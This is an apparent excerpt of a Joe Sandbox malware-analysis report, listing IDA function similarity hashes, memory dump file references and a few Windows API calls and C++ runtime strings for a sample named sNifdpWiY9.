                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f66f5835460db7afc21cd6eba1265fe9717d00670ee0e09673073ff3daa238ad
                            • Instruction ID: fe1be7d6ae46e03b6d70af4afbf49c62291bfb6c0ce67681376aeec37603a17e
                            • Opcode Fuzzy Hash: f66f5835460db7afc21cd6eba1265fe9717d00670ee0e09673073ff3daa238ad
                            • Instruction Fuzzy Hash: E3F1B0F7A18BD182E7649F19D4406ACB764FB14BA0F994626CF69577C4CF38E861C320
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0fc4873ec3734153ff99f59d90c62af5691622f3d8740f27435824c7d82fedcd
                            • Instruction ID: e0f781f7e6dc3537adfed0e7c0f99c3587347a42eb2aceb8d75bdc9a8b21a625
                            • Opcode Fuzzy Hash: 0fc4873ec3734153ff99f59d90c62af5691622f3d8740f27435824c7d82fedcd
                            • Instruction Fuzzy Hash: 69B1A573B08BC589D770AB15A4405EAA361FB947D4F9C8231EE8D5B788DF3CE4629710
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: daecd41c32483507804ec4c4211b7fcfce1993ef1a68a42d00d6a5003e88a427
                            • Instruction ID: c63a70d93a0fcf827c74aaf2468086507c69dee6ae52c3bff8d2fba5afbca914
                            • Opcode Fuzzy Hash: daecd41c32483507804ec4c4211b7fcfce1993ef1a68a42d00d6a5003e88a427
                            • Instruction Fuzzy Hash: E071C223A18AC585E670AA15E4406FEA365FB45BD4F988131EE8D87B9CDF3CE481D710
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fb495e440ad794ce6a3a15fbb1ad3f3a3b70adb389507deacf26e2957873038a
                            • Instruction ID: 2d4940763c27b88784819d87f688f9fee3980c5fe15aebeeb28bd830af6b2647
                            • Opcode Fuzzy Hash: fb495e440ad794ce6a3a15fbb1ad3f3a3b70adb389507deacf26e2957873038a
                            • Instruction Fuzzy Hash: 2171A926B096DA89EB74AB25D0046F9A760FB61B44F9D4531CE490B7D4DF3CE862E320
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b10934b6bb9ff3b514d4cc249199f16c9742f9909e6be219d6a8263032602018
                            • Instruction ID: 614d01679356db03b6b222360d46bee5bce077317370e291a93266eb776f5313
                            • Opcode Fuzzy Hash: b10934b6bb9ff3b514d4cc249199f16c9742f9909e6be219d6a8263032602018
                            • Instruction Fuzzy Hash: 46514897D0EEC607F3D256784D6D0A96FD1EB92E007AE807BC384C21DBEF1928808761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 76f0ad4279020e9ef10e54f162a70e46740e02c1b66352d31608988650c94229
                            • Instruction ID: 683338037b990c197ba22b2cf292698e9119957e7c4e186c40aea37f6f12e112
                            • Opcode Fuzzy Hash: 76f0ad4279020e9ef10e54f162a70e46740e02c1b66352d31608988650c94229
                            • Instruction Fuzzy Hash: 61512697D0EEC507F3D256784D6D0A96FD1EB92E017AE907BC384C21DBEF5928808761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 478f2f235a539d591e7021ec0d09dd2fd92d248d29de88019e58d9f3ce446777
                            • Instruction ID: 484a8881b9aa00dc4e7ec999e718d32e402ab6c3e9444e9c2811dfcdd8ccfa10
                            • Opcode Fuzzy Hash: 478f2f235a539d591e7021ec0d09dd2fd92d248d29de88019e58d9f3ce446777
                            • Instruction Fuzzy Hash: 87410632B052918EEB14DF26D808BB9BB91FB48B84F898535DE0D9B700EA38F515CB10
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CriticalLeaveSection
                            • String ID:
                            • API String ID: 3988221542-0
                            • Opcode ID: 054a5dbe9471a283ba5196163799957f6ee46336e60399a3594864f5020b762b
                            • Instruction ID: 417b8021a80e1d3141ea3a883025363499f26f2ee5dc180f2450d650b7440336
                            • Opcode Fuzzy Hash: 054a5dbe9471a283ba5196163799957f6ee46336e60399a3594864f5020b762b
                            • Instruction Fuzzy Hash: 4E417C72E1874687EB9D8E29E4143793A91B794389FB48239DB098E7C0CE3DE645CB41
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b664bc92486b94774e2d03a715eaf1ac27868edddb3aa6ccb711c1054b19e62e
                            • Instruction ID: 22147cb3567b17bc0efc51355249cd26c172aba7cc8abb1fbb939aa00e9bc071
                            • Opcode Fuzzy Hash: b664bc92486b94774e2d03a715eaf1ac27868edddb3aa6ccb711c1054b19e62e
                            • Instruction Fuzzy Hash: A241A732B59E8685EA21BF2DE4400FDE364AB497A4F9C4131EE8D87369CF2CE445C760
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 310cf0d5d7753a0825e04fbd76d15a37fc27de77506eaa8c39906b8b90229593
                            • Instruction ID: 32d0324d0f962649c403a441999e184db085bf0808d57962d8a42494f8877458
                            • Opcode Fuzzy Hash: 310cf0d5d7753a0825e04fbd76d15a37fc27de77506eaa8c39906b8b90229593
                            • Instruction Fuzzy Hash: 26311B33B1458187EA20BE29D048BF9F691EB80B90F9C8539DB9E4B7C4DE2DE855D710
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a0dd75849ad9a8622f8407dff4195338a571a6b28b5630b93c08fde665f15614
                            • Instruction ID: c4ce7f320f6ac98e6b333e03a5cac9d5029f32ae1182004737e2197444279aa0
                            • Opcode Fuzzy Hash: a0dd75849ad9a8622f8407dff4195338a571a6b28b5630b93c08fde665f15614
                            • Instruction Fuzzy Hash: 93411797D0EEC507F3D65A784D6D0A96FD1EB92E007AED07BC384C21DBEF5928808661
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9bc8e2c36a9a77949a0ce3ce955f3c4533d9386945cff67f7bbebd70835b3263
                            • Instruction ID: 0db793cbc130693102c0ce60643e8632a69415236bf417aa4f5992b09ef44ac8
                            • Opcode Fuzzy Hash: 9bc8e2c36a9a77949a0ce3ce955f3c4533d9386945cff67f7bbebd70835b3263
                            • Instruction Fuzzy Hash: 4E311497D0DEC50BF3D65A784D6D0AA7FD1EB92E047AEC07BC284C21DBAE5928408661
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f5badb1f551a1dc5dff83950e103f866b31b39bfed2660cd819394cf53cf34ef
                            • Instruction ID: 0b05eed090b462187ded3ac6837d7b6b2c125dc2780d57c6a4d48c2fc59d37ef
                            • Opcode Fuzzy Hash: f5badb1f551a1dc5dff83950e103f866b31b39bfed2660cd819394cf53cf34ef
                            • Instruction Fuzzy Hash: 2A216797C0DEC10BF3D6A978896D0F96F91DB93D047AE4077C384C218BAE5E18458761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93911a5bcf6dc6d46fe3ca431bcdc04620c5882bef696c400fe60b32c80ffbc2
                            • Instruction ID: 096f3ad1619adec67ebb4394ef6090af279bc6bdf30a5b51d6462520bdd6c679
                            • Opcode Fuzzy Hash: 93911a5bcf6dc6d46fe3ca431bcdc04620c5882bef696c400fe60b32c80ffbc2
                            • Instruction Fuzzy Hash: 0D21A076A16F9989EB14DFA6E8810EC77B4F749BDCB441126EE4D53B1DDF38C0908250
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ab075291c5626fefdf75033fda537bb27fb1278482499d65bb1056527ff6b6a4
                            • Instruction ID: 232c89810ccebb824c9cdc8fee492b13569d72f524f5d61aa232c9f2fd513431
                            • Opcode Fuzzy Hash: ab075291c5626fefdf75033fda537bb27fb1278482499d65bb1056527ff6b6a4
                            • Instruction Fuzzy Hash: 91F08673A19A8485CB10AF29E444469A7A4FB5CBD4B98A035EE8D5B718CE3CD451CB10
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08b35e1b5f6a629d6a7a56c5a219b4f95b7861e3c92cf6fbf46a5b912a6fa943
                            • Instruction ID: 60b5f0ef64b8fbde8ed7c0794c9ef0f5fd589a9a0894af37fec25db7c968cbd5
                            • Opcode Fuzzy Hash: 08b35e1b5f6a629d6a7a56c5a219b4f95b7861e3c92cf6fbf46a5b912a6fa943
                            • Instruction Fuzzy Hash: F1F03797D0DEC64BF3D619B8582E05A7FC1AB92D0C79D807BD384C22CF9F1928404715
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c780cca8185bbb1400c716ca8c8d3d8fc60e0f30509476beeefa4faa19091d10
                            • Instruction ID: 2b685872291316edf6ba2821b64153e42807bf5e4634ab5f271a7a67cc680de1
                            • Opcode Fuzzy Hash: c780cca8185bbb1400c716ca8c8d3d8fc60e0f30509476beeefa4faa19091d10
                            • Instruction Fuzzy Hash: BBA0022395FD4180E3441B00AD151B0A22CD706308B68A0328158E10558F6CD2D06154
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: fwrite$fputs$free$abortfputcmemcpystrlen
                            • String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                            • API String ID: 360841300-808685626
                            • Opcode ID: ef8d5e62435b848e70d940158ae6fe90ce459ba793606d3db35fe2bce993bec3
                            • Instruction ID: 3a25fe29c78a7d70095c9c5fe94f6501765bcbddd5f3cf462eaab032b0ac5335
                            • Opcode Fuzzy Hash: ef8d5e62435b848e70d940158ae6fe90ce459ba793606d3db35fe2bce993bec3
                            • Instruction Fuzzy Hash: 5641D221F18A8251FA10BB62E5293F996559F85B84FCC403AE90D8F3DADF2DF4119372
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: _errnowcslen$wcscat$AttributesFilemalloc
                            • String ID: \
                            • API String ID: 426074236-2967466578
                            • Opcode ID: b182f80caeade51041412301e2105172a5513fe7e352059671e245029b8fee72
                            • Instruction ID: 14b7f744647d06c869bce66591ebb6a455c2d6ae038f28e0cd6cbcbdc4624a49
                            • Opcode Fuzzy Hash: b182f80caeade51041412301e2105172a5513fe7e352059671e245029b8fee72
                            • Instruction Fuzzy Hash: 3231A051A2838244FB64BF6598297F8E290AF84B94FCC4131DA5D4F2C6CF7CB4A4A631
                            APIs
                            • TlsAlloc.KERNEL32 ref: 00007FF75F8CD5AD
                            • abort.MSVCRT(?,?,00007FF75F9D0190,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998F56
                            • abort.MSVCRT(?,?,00007FF75F9D0190,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998F5C
                            • GetModuleHandleA.KERNEL32 ref: 00007FF75F998FAD
                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998FCC
                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF75F8CE619,?,?,?,?,00007FF75F8D0B9F), ref: 00007FF75F998FDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: AddressProcabort$AllocHandleModulecalloc
                            • String ID: once %p is %ld$AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
                            • API String ID: 3654027789-2209695033
